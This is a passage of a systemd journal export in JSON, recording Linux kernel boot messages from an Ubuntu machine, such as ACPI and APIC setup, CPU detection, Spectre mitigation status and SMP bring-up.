"MESSAGE" : "console [tty1] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=82;b=e2b08827b5804427b422c10c84f1567e;m=5586e6;t=5bd16dd19064d;x=710e7e5bf1ae139d", "__REALTIME_TIMESTAMP" : "1615280779888205", "__MONOTONIC_TIMESTAMP" : "5605094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [ttyS0] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=83;b=e2b08827b5804427b422c10c84f1567e;m=5586f1;t=5bd16dd190659;x=b0d667d63ba34732", "__REALTIME_TIMESTAMP" : "1615280779888217", "__MONOTONIC_TIMESTAMP" : "5605105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: Core revision 20170831" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=84;b=e2b08827b5804427b422c10c84f1567e;m=5586fa;t=5bd16dd190662;x=92661cfbe6db2a18", "__REALTIME_TIMESTAMP" : "1615280779888226", "__MONOTONIC_TIMESTAMP" : "5605114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: 1 ACPI AML tables successfully acquired and loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=85;b=e2b08827b5804427b422c10c84f1567e;m=558703;t=5bd16dd19066a;x=d6d886985107b215", "__REALTIME_TIMESTAMP" : "1615280779888234", "__MONOTONIC_TIMESTAMP" : "5605123", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4012", "MESSAGE" : "APIC: Switch to symmetric I/O mode setup" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=86;b=e2b08827b5804427b422c10c84f1567e;m=55870c;t=5bd16dd190673;x=a1961cb49536ff59", "__REALTIME_TIMESTAMP" : "1615280779888243", "__MONOTONIC_TIMESTAMP" : "5605132", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "6594", "MESSAGE" : "x2apic enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=87;b=e2b08827b5804427b422c10c84f1567e;m=558715;t=5bd16dd19067d;x=4c6f848de3d9c0ee", "__REALTIME_TIMESTAMP" : "1615280779888253", "__MONOTONIC_TIMESTAMP" : "5605141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "8004", "MESSAGE" : "Switched APIC routing to physical x2apic." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=88;b=e2b08827b5804427b422c10c84f1567e;m=55871f;t=5bd16dd190686;x=f1b82f3ef3a09e2b", "__REALTIME_TIMESTAMP" : "1615280779888262", "__MONOTONIC_TIMESTAMP" : "5605151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "12682", "MESSAGE" : "..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=89;b=e2b08827b5804427b422c10c84f1567e;m=558728;t=5bd16dd19068f;x=7bc3ec2567970a35", "__REALTIME_TIMESTAMP" : "1615280779888271", "__MONOTONIC_TIMESTAMP" : "5605160", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "15744", "MESSAGE" : "tsc: Detected 2099.990 MHz processor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8a;b=e2b08827b5804427b422c10c84f1567e;m=558734;t=5bd16dd19069c;x=e94f89dba5e05079", "__REALTIME_TIMESTAMP" : "1615280779888284", "__MONOTONIC_TIMESTAMP" : "5605172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "16012", "MESSAGE" : "Calibrating delay loop (skipped) preset value.. 4199.98 BogoMIPS (lpj=8399960)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8b;b=e2b08827b5804427b422c10c84f1567e;m=55873d;t=5bd16dd1906a5;x=adc6f086387cee55", "__REALTIME_TIMESTAMP" : "1615280779888293", "__MONOTONIC_TIMESTAMP" : "5605181", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "20003", "MESSAGE" : "pid_max: default: 32768 minimum: 301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8c;b=e2b08827b5804427b422c10c84f1567e;m=558746;t=5bd16dd1906ae;x=141973390bbbd033", "__REALTIME_TIMESTAMP" : "1615280779888302", "__MONOTONIC_TIMESTAMP" : "5605190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "24037", "MESSAGE" : "Security Framework initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8d;b=e2b08827b5804427b422c10c84f1567e;m=558752;t=5bd16dd1906b9;x=f69cac992562d9c6", "__REALTIME_TIMESTAMP" : "1615280779888313", "__MONOTONIC_TIMESTAMP" : "5605202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "26234", "MESSAGE" : "Yama: becoming mindful." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8e;b=e2b08827b5804427b422c10c84f1567e;m=55875b;t=5bd16dd1906c3;x=a5e24fb83560b6c7", "__REALTIME_TIMESTAMP" : "1615280779888323", "__MONOTONIC_TIMESTAMP" : "5605211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "28043", "MESSAGE" : "AppArmor: AppArmor initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8f;b=e2b08827b5804427b422c10c84f1567e;m=558764;t=5bd16dd1906cc;x=6c308ef50c3a5d50", "__REALTIME_TIMESTAMP" : "1615280779888332", "__MONOTONIC_TIMESTAMP" : "5605220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "32056", "MESSAGE" : "Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=90;b=e2b08827b5804427b422c10c84f1567e;m=55876e;t=5bd16dd1906d5;x=b89ec68ac8b48021", "__REALTIME_TIMESTAMP" : "1615280779888341", "__MONOTONIC_TIMESTAMP" : "5605230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "36034", "MESSAGE" : "Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=91;b=e2b08827b5804427b422c10c84f1567e;m=558777;t=5bd16dd1906de;x=d5cbd363193285fd", "__REALTIME_TIMESTAMP" : "1615280779888350", "__MONOTONIC_TIMESTAMP" : "5605239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "39434", "MESSAGE" : "Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=92;b=e2b08827b5804427b422c10c84f1567e;m=558780;t=5bd16dd1906e7;x=fa98366b38acd874", "__REALTIME_TIMESTAMP" : "1615280779888359", "__MONOTONIC_TIMESTAMP" : "5605248", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "40006", "MESSAGE" : "Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=93;b=e2b08827b5804427b422c10c84f1567e;m=558789;t=5bd16dd1906f0;x=3f1c170ea1e6bf54", "__REALTIME_TIMESTAMP" : "1615280779888368", "__MONOTONIC_TIMESTAMP" : "5605257", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "44336", "MESSAGE" : "Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=94;b=e2b08827b5804427b422c10c84f1567e;m=558792;t=5bd16dd1906f9;x=cf6fcc04e36b3efb", "__REALTIME_TIMESTAMP" : "1615280779888377", "__MONOTONIC_TIMESTAMP" : "5605266", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "48003", "MESSAGE" : "Last level dTLB entries: 4KB 0, 2MB 0, 4MB 0, 1GB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=95;b=e2b08827b5804427b422c10c84f1567e;m=55879b;t=5bd16dd190703;x=58189c75c4c81c80", "__REALTIME_TIMESTAMP" : "1615280779888387", "__MONOTONIC_TIMESTAMP" : "5605275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "52004", "MESSAGE" : "Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=96;b=e2b08827b5804427b422c10c84f1567e;m=5587b5;t=5bd16dd19071d;x=ef7fdd149e9c0257", "__REALTIME_TIMESTAMP" : "1615280779888413", "__MONOTONIC_TIMESTAMP" : "5605301", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "56003", "MESSAGE" : "Spectre V2 : Mitigation: Full generic retpoline" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=97;b=e2b08827b5804427b422c10c84f1567e;m=5587e2;t=5bd16dd19074a;x=89029417d35b153e", "__REALTIME_TIMESTAMP" : "1615280779888458", "__MONOTONIC_TIMESTAMP" : "5605346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "58337", "MESSAGE" : "Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=98;b=e2b08827b5804427b422c10c84f1567e;m=5587ed;t=5bd16dd190755;x=a1c31d80f87bf9a1", "__REALTIME_TIMESTAMP" : "1615280779888469", "__MONOTONIC_TIMESTAMP" : "5605357", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "60002", "MESSAGE" : "Spectre V2 : Enabling Restricted Speculation for firmware calls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=99;b=e2b08827b5804427b422c10c84f1567e;m=5587f7;t=5bd16dd19075f;x=61abf76af5eb1488", "__REALTIME_TIMESTAMP" : "1615280779888479", "__MONOTONIC_TIMESTAMP" : "5605367", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "64013", "MESSAGE" : "Spectre V2 : mitigation: Enabling conditional Indirect Branch Prediction Barrier" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9a;b=e2b08827b5804427b422c10c84f1567e;m=558802;t=5bd16dd190769;x=c2b3c220b9500653", "__REALTIME_TIMESTAMP" : "1615280779888489", "__MONOTONIC_TIMESTAMP" : "5605378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "68003", "MESSAGE" : "Speculative Store Bypass: Mitigation: Speculative Store Bypass disabled via prctl and seccomp" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9b;b=e2b08827b5804427b422c10c84f1567e;m=55880c;t=5bd16dd190773;x=4a3a4241b62f64d7", "__REALTIME_TIMESTAMP" : "1615280779888499", "__MONOTONIC_TIMESTAMP" : "5605388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "72048", "MESSAGE" : "MDS: Mitigation: Clear CPU buffers" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9c;b=e2b08827b5804427b422c10c84f1567e;m=558816;t=5bd16dd19077d;x=ca6658fda5d13a1f", "__REALTIME_TIMESTAMP" : "1615280779888509", "__MONOTONIC_TIMESTAMP" : "5605398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "91684", "MESSAGE" : "Freeing SMP alternatives memory: 36K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9d;b=e2b08827b5804427b422c10c84f1567e;m=558831;t=5bd16dd190798;x=b8166bd5baf8d6d1", "__REALTIME_TIMESTAMP" : "1615280779888536", "__MONOTONIC_TIMESTAMP" : "5605425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "96553", "MESSAGE" : "TSC deadline timer enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9e;b=e2b08827b5804427b422c10c84f1567e;m=55883c;t=5bd16dd1907a3;x=5cb1c588c308ecba", "__REALTIME_TIMESTAMP" : "1615280779888547", "__MONOTONIC_TIMESTAMP" : "5605436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "96556", "MESSAGE" : "smpboot: CPU0: Intel Core Processor (Skylake, IBRS) (family: 0x6, model: 0x5e, stepping: 0x3)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9f;b=e2b08827b5804427b422c10c84f1567e;m=55884c;t=5bd16dd1907b4;x=1ac20c1cab97e364", "__REALTIME_TIMESTAMP" : "1615280779888564", "__MONOTONIC_TIMESTAMP" : "5605452", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "100099", "MESSAGE" : "Performance Events: unsupported p6 CPU model 94 no PMU driver, software events only." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a0;b=e2b08827b5804427b422c10c84f1567e;m=558858;t=5bd16dd1907bf;x=e9d2385de9d67c19", "__REALTIME_TIMESTAMP" : "1615280779888575", "__MONOTONIC_TIMESTAMP" : "5605464", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "104049", "MESSAGE" : "Hierarchical SRCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a1;b=e2b08827b5804427b422c10c84f1567e;m=558863;t=5bd16dd1907ca;x=c20d97da25d55b95", "__REALTIME_TIMESTAMP" : "1615280779888586", "__MONOTONIC_TIMESTAMP" : "5605475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "107139", "MESSAGE" : "NMI watchdog: Perf event create on CPU 0 failed with -2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a2;b=e2b08827b5804427b422c10c84f1567e;m=55886e;t=5bd16dd1907d5;x=f34ce16a2801a7cf", "__REALTIME_TIMESTAMP" : "1615280779888597", "__MONOTONIC_TIMESTAMP" : "5605486", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "108004", "MESSAGE" : "NMI watchdog: Perf NMI watchdog permanently disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a3;b=e2b08827b5804427b422c10c84f1567e;m=55887b;t=5bd16dd1907e2;x=9e2f8a8d707002f2", "__REALTIME_TIMESTAMP" : "1615280779888610", "__MONOTONIC_TIMESTAMP" : "5605499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "111112", "MESSAGE" : "smp: Bringing up secondary CPUs ..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a4;b=e2b08827b5804427b422c10c84f1567e;m=558886;t=5bd16dd1907ed;x=bb76f562d5c0de88", "__REALTIME_TIMESTAMP" : "1615280779888621", "__MONOTONIC_TIMESTAMP" : "5605510", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "112005", "MESSAGE" : "smp: Brought up 1 node, 1 CPU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a5;b=e2b08827b5804427b422c10c84f1567e;m=558891;t=5bd16dd1907f8;x=33b630f886699e2d", "__REALTIME_TIMESTAMP" : "1615280779888632", "__MONOTONIC_TIMESTAMP" : "5605521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "114131", "MESSAGE" : "smpboot: Max logical packages: 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a6;b=e2b08827b5804427b422c10c84f1567e;m=55889b;t=5bd16dd190803;x=2a53e8a90fc43148", "__REALTIME_TIMESTAMP" : "1615280779888643", "__MONOTONIC_TIMESTAMP" : "5605531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "116005", "MESSAGE" : "smpboot: Total of 1 processors activated (4199.98 BogoMIPS)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a7;b=e2b08827b5804427b422c10c84f1567e;m=5588a6;t=5bd16dd19080e;x=746894420000de9d", "__REALTIME_TIMESTAMP" : "1615280779888654", "__MONOTONIC_TIMESTAMP" : "5605542", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "119435", "MESSAGE" : "devtmpfs: initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a8;b=e2b08827b5804427b422c10c84f1567e;m=5588b1;t=5bd16dd190818;x=e72a5a38f55f26df", "__REALTIME_TIMESTAMP" : "1615280779888664", "__MONOTONIC_TIMESTAMP" : "5605553", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "120068", "MESSAGE" : "x86/mm: Memory block size: 128MB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a9;b=e2b08827b5804427b422c10c84f1567e;m=5588bb;t=5bd16dd190823;x=c0a4ca14054c8e4", "__REALTIME_TIMESTAMP" : "1615280779888675", "__MONOTONIC_TIMESTAMP" : "5605563", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "122504", "MESSAGE" : "evm: security.selinux" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=aa;b=e2b08827b5804427b422c10c84f1567e;m=5588c6;t=5bd16dd19082d;x=558fdecd8286a4dc", "__REALTIME_TIMESTAMP" : "1615280779888685", "__MONOTONIC_TIMESTAMP" : "5605574", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 